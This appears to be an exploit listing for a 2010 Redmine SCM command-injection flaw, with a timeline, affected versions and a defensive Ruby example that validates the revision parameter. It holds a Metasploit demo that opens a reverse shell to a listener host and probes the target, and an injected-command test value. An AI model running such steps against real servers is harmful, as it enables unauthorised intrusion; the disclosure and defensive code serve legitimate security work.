Description: Timeline:
Vulnerability submitted to Redmine by joernchen on 2010-12-18
Vulnerability advisory and new package provided by Redmine on 2010-12-23
Metasploit exploit released on 2010-12-24
Provided by:
joernchen
References:
OSVDB-70090
Affected versions:
All versions of Redmine prior to 1.0.5, including 0.9.x
redmine_1.0.4-1_all.deb on Debian Squeeze / Sid
redmine_1.0.4-1_all.deb on Ubuntu Lucid
Tested on Ubuntu Lucid 10.04.1 LTS with:
CVS as SCM
Description:
This module exploits an arbitrary command execution vulnerability in the Redmine repository controller. The flaw is triggered when a rev parameter is passed to the command line of the SCM tool without adequate filtering.
Not all SCMs are affected: only Bazaar, CVS, Darcs and Mercurial. After exploitation you will get a remote shell with the privileges of the user running Redmine (for example apache).
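The defensive counterpart of the flaw described above, as an added example (not Redmine's code and not part of the original page): the rev value is checked against an allowlist and the command is built as an argv array, so no shell ever parses it. The names REV_PATTERN, valid_rev?, scm_log_argv, run_argv, echo_tool_argv and the tool name "scm-tool" are hypothetical.

```ruby
require "open3"
require "rbconfig"

# Hypothetical allowlist for a revision identifier. \A and \z anchor the
# whole string (^ and $ only anchor a line in Ruby), and the first
# character must be alphanumeric so the value can never start with "-"
# and be read by the tool as an option.
REV_PATTERN = /\A[A-Za-z0-9][A-Za-z0-9._-]{0,63}\z/

def valid_rev?(rev)
  rev.is_a?(String) && REV_PATTERN.match?(rev)
end

# Build the command as an argv array, never as one shell string.
# "scm-tool" and this argument layout are placeholders, not a real CLI.
def scm_log_argv(rev, path, tool: "scm-tool")
  raise ArgumentError, "rejected rev: #{rev.inspect}" unless valid_rev?(rev)
  [tool, "log", "-r", rev, "--", path]
end

# Open3 given several arguments execs the program directly, without
# /bin/sh, so every element reaches the child as one literal argument.
def run_argv(argv)
  out, status = Open3.capture2e(*argv)
  raise "command failed (#{status.exitstatus})" unless status.success?
  out
end

# Offline stand-in for the SCM binary: a Ruby one-liner that prints the
# arguments it received, one per line.
def echo_tool_argv(args)
  [RbConfig.ruby, "-e", "puts ARGV", "--", *args]
end

if $PROGRAM_NAME == __FILE__
  hostile = "1.4; id" # constructed sample value
  puts valid_rev?("1.4")      # accepted
  puts valid_rev?(hostile)    # rejected by the allowlist
  # Second layer: even unvalidated, the argv form keeps it one argument.
  puts run_argv(echo_tool_argv(["log", "-r", hostile]))
end
```

The allowlist and the argv form are independent layers: either one alone stops the value from being interpreted by a shell, and the leading-character rule additionally stops it from being parsed as a tool option.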
Metasploit demo:
use exploit/unix/webapp/redmine_scm_exec
set RHOST 192.168.178.21
set URI /redmine/projects/project2/
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.178.21
exploit
id
uname -a
/sbin/ifconfig
Tags: redmine, exploit, metasploit, rce, unix, linux